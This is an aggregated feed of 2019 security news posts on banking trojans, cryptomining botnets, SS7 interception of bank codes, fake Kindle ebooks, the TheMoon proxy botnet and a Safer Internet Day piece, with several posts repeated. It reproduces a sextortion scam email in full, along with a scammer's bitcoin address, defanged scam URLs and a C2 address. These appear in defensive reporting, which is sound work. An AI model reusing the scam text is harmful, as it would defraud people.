In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

IBM X-Force Research

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

Safer Internet Day 2019 – Together for a Better Internet

What You Can Do Today to Help Create a Better Internet

 

Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

The 4R’s of Online Safety

In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives

  1. Respect – ‘I treat myself and others the way I like to be treated’

I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

Keyboard warriors who fire off abusive comments online, or harass and troll others clearly do not have any notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications as the dialogue is not just contained to a few, rather it is witnessed by everyone’s online friends which could stretch into the 1000’s. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

  1. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possible include interactions with the police department.

But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

  1. Reasoning – ‘I question what is real’

Teaching our kids to think critically is an essential survival skill for our kids in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

  1. Resilience – ‘I get back up from tough situations’

Unfortunately, the chances that your child will experience some challenges online is quite high. Whether someone posts a mean comment, they are harassed, or worst case, cyberbullied – these nasty online interactions can really hurt.

Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

What Can You Do this Safer Internet Day?

Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

 

 

 

 

 

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware

An analysis of more than 4.4 million malware samples showed botnets were responsible for crypto-mining at least 4.3 percent of Monero over a 12-year period.

These illicit efforts generated an estimated $56 million for cybercriminals behind the campaigns. The study from academics in the U.K. and Spain used a combination of both dynamic and static analysis techniques to pull details from the malware campaigns, including an exploration of the mining pools where payments were made as well as cryptocurrency addresses. Over the 12 years, Monero (XMR) was the most popular cryptocurrency targeted by botnets, the study concluded.

New Crypto-Mining Threat Groups Discovered

While the research paper mentioned previously known malware campaigns such as Smominru and Adylkuzz, the study’s authors also noted some new threat actors. These included Freebuf and USA-138, which used general-purpose botnets rather than renting third-party infrastructure to carry out their mining operations.

Though the latter technique tended to be more successful based on the analyses in the study, the findings are a reminder that cybercriminals are highly capable of using legitimate file management tools and code repositories for illicit purposes.

Since mining pools are known to ban suspicious XMR addresses from time to time, and because mining protocols are subject to change, the researchers concluded that some malware authors often modified their code. Some of these campaigns are still active, while others were relatively brief, according to the paper.

In terms of methodology, the researchers said xmrig, an open-source tool, was most commonly used to build the malware strains that powered crypto-mining bots.

Catching Crypto-Mining Before It Happens

Beyond the money it generates for threat actors, crypto-mining, also known as crypto-jacking, has the secondary adverse impact of draining an organization’s central processing unit (CPU) resources.

IBM X-Force research published last year confirmed that crypto-mining has grown significantly over the past few years and needs to become an active part of IT security monitoring. As it becomes a more persistent threat, utilizing security information and event management (SIEM) tools combined with strong endpoint protection is one of the best ways to ensure your technology infrastructure doesn’t become a place for criminals to harvest Monero.

The post Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware appeared first on Security Intelligence.

Movie stream ebooks gun for John Wick 3 on Kindle store

We discovered a novel spam campaign over the weekend, targeting fans of John Wick on the Amazon Kindle store. The scam itself involves paying for what appears to be the upcoming third movie, turns into a bogus ebook, and goes on to hyperlink potential victims to a collection of third-party websites.

How does this begin?

With a dog, a grieving assassin, and a pencil.

Actually, it begins with me hunting for John Wick graphic novels on the Kindle store. What I found isn’t exactly hidden from view—as you can see from the screenshots, the bogus results kick in right under the second genuine entry:

ebooks on phone

Click to enlarge

What are we looking at here?

Roughly 40 or more individual items uploaded from around January 25 to February 2, each one from a different “author.” At first glance, you might think you’re looking at movies, thanks to the play button icon on each image preview. The fact that each entry is called something along the lines of “John Wick 3: free movie HD” probably helps, too.

ebooks on the store

Click to Enlarge

All of the items are on sale for a variety of prices including £0.99 each, £9.93, £12.19, and up to an astonishing £15.25 (roughly $20 USD). A few of them are listed as free, and all of them have a preview available.

That's an expensive ebook

Click to enlarge

At this point, someone seeing this may think they’re actually buying a copy of John Wick 3. This is where it gets interesting.

This isn’t John Wick 3, is it?

Correct, it absolutely is not John Wick 3. What we have here is an incredibly basic ebook with a “play movie” image bolted onto the preview. Opening up the preview gives us a slice of “coming soon” style text for the movie, due out in May.

The text reads as follows, and appears to be the same content used in each ebook:

John Wick: Chapter 3 – Parabellum 

When we last observed John Wick, he wasn’t in the best shape as he’d quite recently had a worldwide contract hit put out on him toward the finish of John Wick: Chapter 2.  

So most would agree that the third motion picture in the hit activity establishment, driven by Keanu Reeves, won’t be a steady walk around the recreation center. Indeed, even the full title, John Wick: 

Chapter 3 – Parabellum, insights at the massacre in store as Reeves clarified recently.  

“[It means] get ready for war. It’s a piece of that popular sentence, ‘Si vis pacem, para bellum’ which interprets as, ‘On the off chance that you need harmony, get ready for war’,” he laid out. All things considered, Wick said he’d “execute them all” toward the finish of Chapter 2.

Looking at the “Click here” text isn’t useful on a mobile device, because in practice I couldn’t get it to recognise my clicks. I also couldn’t figure out what the clickable link was from looking at it on the mobile, either. With that in mind, it was time to port over to a desktop and fire up an appropriate reader.

A quick port to a desktop reader later, and we now have a fully clickable link:

Bogus ebook

Click to enlarge

Where does the link go?

It takes would-be Wick watchers to:

Livemovie(dot)xyz/play(dot)php?movie=458156

Which is a portal that claims to offer up multiple movies:

movie portal

Click to enlarge

The movie we’re interested in here is John Wick 3:

wick link

Click to enlarge

No matter what you do at this point, the only option here is “be forwarded to another site” via the register button: 

register

Click to enlarge

Our tour of the movie world upside-down now takes us to:

Flowerfun(dot)net/en/html/sf/registration/eone.html

movie site

Click to enlarge

This style of site may be familiar to regular readers. They typically claim to offer all sorts of media content and claim free sign ups, but there’s usually a rolling charge or fees somewhere in the mix. The site says the following:

You agree that, on registration for a Membership, you authorise us to place a pre-authorisation hold (between USD $1.00 to 2.00) on your Payment Card to validate your billing address and other Payment Card information.

Depending on your region, you may find yourself sent to similar sites like:

signup(dot)lymemedia(dot)net

second site

Click to enlarge

However, there is no further information in the T&C or Privacy Policy for either site that states exactly what sort of payment is (or isn’t) expected after signing up. One thing is for certain: Someone wasting up to £15 on a bogus ebook then bouncing from site to site isn’t going to end up with a legitimate version of John Wick 3.

Don’t set him off

It’s tricky to flag dubious content on the Kindle store, as you have to report each title individually and give reasons. We contacted Amazon customer support and have been informed these ebooks have been escalated to the appropriate teams.

Amazon has had problems with fake ebooks before, though those were in the business of swiping author’s content and making as much money as possible before being shut down. What we have here are worthless ebooks with no content, save for clickthrough links to streaming portals. At time of writing, the ebooks we discovered are still available for purchase.

If you’re on the hunt for John Wick, the lesson is clear: don’t bring an ebook to a gunfight.

The post Movie stream ebooks gun for John Wick 3 on Kindle store appeared first on Malwarebytes Labs.

Security Affairs: Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against the Metro Bank, threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text messages to customers to authorize transactions.

The Signaling System 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another is needed for routing calls and text messages between several networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaw in the SS7 protocol to defeat the 2FA authentication used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.” reported Motherboard that first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.

ss7 Metro Bank attacks

This is not an isolated case, other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

Major British UK company BT confirmed that it is aware of SS7 attacks to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe there is a well-resourced and coordinate cyber criminal group of highly skilled professionals.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.



Security Affairs

Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against the Metro Bank, threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text messages to customers to authorize transactions.

The Signaling System 7, aka SS7, which is a set of protocols developed in 1975 that allows the connections of one mobile phone network to another. The information passed from a network to another is needed for routing calls and text messages between several networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaw in the SS7 protocol to defeat the 2FA authentication used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.reported Motherboard that first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.

ss7 Metro Bank attacks

This is not an isolated case, other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

Major British UK company BT confirmed that it is aware of SS7 attacks to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe there is a well-resourced and coordinate cyber criminal group of highly skilled professionals.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.

Email authentication use growing steadily in every industry sector

U.S. federal government agencies and many major enterprises have made significant strides to thwart the spread of fake emails, a major cybersecurity attack vector. But many organizations remain susceptible because they’re still not using readily available open standards-based technologies that prevent these fakes from reaching end-user inboxes. Valimail’s “Email Fraud Landscape, Q4 2018” indicates that the fight against fake email is advancing around the world — but email fraud remains a widespread and pernicious problem. … More

The post Email authentication use growing steadily in every industry sector appeared first on Help Net Security.

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a persons audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacys Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employeesdata
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Koreas Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs: Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible, a new variant of sextortion scam appeared in the threat landscape. A new sextortion scam campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script that records a visitor through their webcam.

In a classic social engineering scam, the emails sent to the victims also states inform them that hackers have stolen their data and contacts, the messages include a user’s old password obtained from third-party data breaches. Hackers threaten to publish the stolen material and the alleged videos if the victims will not pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts observed attackers using as bait the news of the hacked adult site.

Bleeping computers also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 

Sextorion scam

Is the campaign effective?

To give you the answer we have to check the balance of the bitcoin addresses included in the email used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019 received approximately .95 bitcoins ($3,200).

Unfortunately, sextortion scams are very profitable for crooks, they are very easy and cheap to arrange and associated risks are very low. 

Other variants of sextortion trick victims into installing malicious attachment that allow crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.



Security Affairs

Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible, a new variant of sextortion scam appeared in the threat landscape. A new sextortion scam campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script that records a visitor through their webcam.

In a classic social engineering scam, the emails sent to the victims also states inform them that hackers have stolen their data and contacts, the messages include a user’s old password obtained from third-party data breaches. Hackers threaten to publish the stolen material and the alleged videos if the victims will not pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts observed attackers using as bait the news of the hacked adult site.

Bleeping computers also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 

Sextorion scam

Is the campaign effective?

To give you the answer we have to check the balance of the bitcoin addresses included in the email used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019 received approximately .95 bitcoins ($3,200).

Unfortunately, sextortion scams are very profitable for crooks, they are very easy and cheap to arrange and associated risks are very low. 

Other variants of sextortion trick victims into installing malicious attachment that allow crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.

Security Affairs: Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.



Security Affairs

Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution for the TheMoon IoT botnet, operators added a previously undocumented module that allows them to offer it with a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.
The botnet target broadband modems or routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs collected evidence that botnet actor has sold this proxy botnet as a service to other cybercrime gangs that were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then they uncovered a C2 operating at 91[.]215[.] 158[.]118. This address was associated with previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests by 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

TheMoon botnet

Further details including IoCs are reported in the analysis published by
CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.

Blog | Avast EN: Fake Android Apps and Phony YouTube Stars | Avast

Fake Android photo apps booted off Google Play

Cybersecurity researchers identified dozens of fake apps on the Google Play Store intended solely for malicious purposes. The apps posed as Android photo enhancers, some claiming to beautify photos as they’re taken, others claiming to provide fun filters for existing pictures. But no matter what the app claimed to be, it didn’t work as promised. The “beautifying” apps triggered a cavalcade of malware-laced ads and phishing attempts, while the “photo filter” apps uploaded user snapshots to the malware’s C&C (Command and Control Server). A trait among each of the dirty apps was the ability to disappear from the application list once installed so the user would have difficulty trying to delete it. Once alerted about the apps, Google immediately removed them from the Play Store.



Blog | Avast EN

Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate

Account takeover-based (ATO) attacks now comprise 20 percent of advanced email attacks, according to Agari’s Q1 2019 Email Fraud & Identity Deception Trends report. ATO attacks are dangerous because they are more difficult to detect than traditional attacks – compromised accounts seem legitimate to email filters and end users alike because they are sent from a real sender’s email account. “Credential phishing was already a huge risk for organizations because of the potential for data … More

The post Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate appeared first on Help Net Security.

SecurityWeek RSS Feed: Facebook Takes Down Vast Iran-led Manipulation Campaign

Facebook said Thursday it took down hundreds of "inauthentic" accounts from Iran that were part of a vast manipulation campaign operating in more than 20 countries.

The world's biggest social network said it removed 783 pages, groups and accounts "for engaging in coordinated inauthentic behavior tied to Iran."

read more



SecurityWeek RSS Feed

Employee Data Compromised in Airbus Breach

Aircraft maker Airbus on Wednesday revealed that information on some of its employees was compromised as a result of a data breach.

According to the company, it detected an intrusion on systems associated with its Commercial Aircraft business, but claims that the incident has not impacted its commercial operations.

read more

SecurityWeek RSS Feed: Employee Data Compromised in Airbus Breach

Aircraft maker Airbus on Wednesday revealed that information on some of its employees was compromised as a result of a data breach.

According to the company, it detected an intrusion on systems associated with its Commercial Aircraft business, but claims that the incident has not impacted its commercial operations.

read more



SecurityWeek RSS Feed

SecurityWeek RSS Feed: Yahoo Breach Settlement Rejected by Judge

A U.S. judge has rejected the settlement between Yahoo and users impacted by the massive data breaches suffered by the company, citing, among other things, inadequate disclosure of the settlement fund and high attorney fees.

read more



SecurityWeek RSS Feed

$1.7 billion in cryptocurrency was stolen and scammed in 2018

$1.7 billion in cryptocurrency was stolen and scammed in 2018 — a dramatic rise in criminal activity despite a slump in the market, according to CipherTrace. Criminals need to launder all these funds in order to cash out before a wave of regulations go into effect in 2019. Theft from cryptocurrency exchanges accounted for the majority of the criminal activity: more than $950 million was stolen in 2018, representing 3.6 times more than in 2017. … More

The post $1.7 billion in cryptocurrency was stolen and scammed in 2018 appeared first on Help Net Security.

CyberCrime & Doing Time: Money Laundering and Counter-Terrorist Financing: What is FATF?

Many cybercrime investigators seem narrowly focused on the bits and bytes of the crimes they investigate while not truly understanding or interacting with those who focus on where the money goes.  As we've been expanding our horizons, I've learned quite a bit and wanted to share some resources for others who may have been similarly limited in their focus.

